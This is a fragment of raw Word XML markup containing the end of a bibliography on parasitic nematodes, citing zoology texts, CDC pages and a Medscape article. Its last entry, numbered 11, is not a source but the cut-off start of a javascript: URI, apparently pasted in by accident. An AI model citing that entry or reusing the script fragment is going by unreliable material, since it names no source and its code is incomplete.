          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, R. L. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Usinger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, R. C. Stebbins, &amp; J. W. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nybakken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, 1979. </w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>General Zoology</w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, 6th edition. New York: McGraw-Hill Book Company.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="00FD2BE6" w:rsidP="00FD2BE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E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(4)</w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Wallace, Robert Lee, Claudia Ricci, &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Giulio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Melone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, 1996. A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cladistic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> analysis of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pseudocoelomate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>aschelminth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) morphology. Invertebrate Biology 115(2): 104-112.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="00FD2BE6" w:rsidP="006B3C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="006B3C59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Centers for Disease Control and Prevention: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Ascaris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Infection</w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="00FD2BE6" w:rsidP="006B3C59">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="006B3C59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Centers for Disease Control and Prevention: Pinworm Infection</w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="00FD2BE6" w:rsidP="006B3C59">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="006B3C59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Centers for Disease Control and Prevention: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Trichinellosis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="00FD2BE6" w:rsidP="006B3C59">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="006B3C59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Centers for Disease Control and Prevention: Hookworm Infection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD2BE6" w:rsidRPr="000E2510" w:rsidRDefault="00FD2BE6" w:rsidP="006B3C59">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="006B3C59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Centers for Disease Control and Prevention: Lymphatic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Filariasis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fact Sheet</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Museo Sans 300" w:eastAsia="Times New Roman" w:hAnsi="Museo Sans 300" w:cs="Times New Roman"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Museo Sans 300" w:eastAsia="Times New Roman" w:hAnsi="Museo Sans 300" w:cs="Times New Roman"/>
          <w:color w:val="444B51"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="006B3C59" w:rsidRDefault="006B3C59" w:rsidP="006B3C59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="377" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3321">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(10)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="006B3C59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="C24F1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hökelek</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="006B3C59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="C24F1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> M et </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="006B3C59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="C24F1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r w:rsidR="006C65E2" w:rsidRPr="006B3C59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006C65E2" w:rsidRPr="006B3C59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nematode Infections, Medscape, Dec 2011</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006B3C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3321">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="006B3C59" w:rsidRPr="007F3321">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3321">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>javascript:try</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>document.body.innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
